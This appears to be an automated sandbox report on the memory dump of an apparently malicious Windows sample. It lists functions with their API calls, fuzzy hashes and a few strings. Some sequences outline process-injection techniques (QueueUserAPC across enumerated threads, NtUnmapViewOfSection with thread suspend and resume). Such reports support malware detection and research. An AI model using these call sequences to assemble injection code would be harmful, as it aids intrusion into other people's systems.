    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
